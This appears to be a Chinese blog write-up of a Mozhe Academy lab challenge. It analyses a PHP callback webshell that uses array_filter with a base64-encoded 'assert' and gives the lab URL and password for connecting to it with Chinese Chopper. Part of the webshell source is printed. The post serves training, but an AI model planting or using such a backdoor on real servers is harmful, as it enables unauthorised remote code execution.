墨者学院 - WebShell代码分析溯源(第4题)

唉让我如此信任的工具在这道题上栽了跟头。。。嗯,以后的结果仅供参考。

 

下载源代码,在hack文件夹下发现bin.php

打开分析代码得知其为php回调函数类一句话木马

且获得其密码,通过菜刀连接

菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0
密码为POST

array_filter()函数用回调函数过滤数组中的值,传入$e的参数为YXNzZXJ0(arrest的base64加密值为YXNzZXJ0)

这样回调函数名就是assert,构成一句话木马     assert($_POST['密码'])

POST为密码

array_filter()函数,用回调函数过滤数组中的值
base64_decode()函数,对base64编码的data进行解码

 

 

<?php
    error_reporting(0);
    $e=$_REQUEST['e'];
    $arr=array($_POST['joker'],);
    a
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值